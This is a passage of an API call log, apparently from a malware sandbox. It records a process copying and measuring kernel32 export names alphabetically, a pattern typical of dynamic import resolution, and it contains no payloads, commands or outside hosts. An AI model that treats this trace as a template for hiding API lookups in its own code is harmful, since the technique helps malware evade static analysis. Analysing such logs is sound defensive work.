lstrlenA (lpString="COPYFILEA") returned 9 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.525] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.525] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.525] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.525] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.525] lstrlenA (lpString="COPYFILEW") returned 9 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.525] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.525] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.525] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.526] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.526] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.526] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.526] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.526] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.526] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.526] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.526] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.526] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.526] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.526] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.526] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.526] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.526] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.526] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.526] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.526] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.526] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.526] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.527] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.527] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.527] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.527] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.527] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.527] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.527] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.527] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.527] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.527] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.527] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.527] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.527] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.527] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.527] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.527] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.527] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.527] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.528] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.528] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.528] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.528] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.528] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.528] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.528] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.528] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.528] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.528] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.528] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.528] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.528] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.528] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.528] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.528] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.528] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.528] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.528] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.529] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.529] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.529] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.529] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.529] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.529] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.529] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.529] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.529] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.529] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.529] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.529] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.529] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.529] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.529] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.529] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.529] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.529] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.530] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.530] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.530] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.530] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.530] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.530] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.530] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.530] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.530] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.530] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.530] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.530] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.530] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.530] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.531] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.531] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.531] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.531] lstrlenA (lpString="DELETEATOM") returned 10 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.531] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.531] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.531] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.531] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.531] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.531] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.531] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.531] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.531] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.531] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.531] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.531] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.531] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.531] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.532] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.532] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.532] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.532] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.532] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.532] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.532] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.532] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.532] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.532] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.532] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.532] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.532] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.532] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.532] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.532] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.532] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.532] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.532] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.533] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.533] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.533] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.533] 